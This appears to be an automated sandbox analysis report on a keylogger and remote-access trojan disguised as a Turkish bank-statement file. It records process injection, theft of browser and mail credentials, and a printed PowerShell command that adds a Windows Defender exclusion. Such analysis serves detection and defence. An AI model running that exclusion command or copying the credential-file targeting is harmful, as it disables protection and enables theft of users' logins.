Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Thread delayed: delay time: 594547	Jump to behavior

Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3893956155.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.000000000406C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Memory written: C:\Users\user\Desktop\hesaphareketi-01.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"			Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"			Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
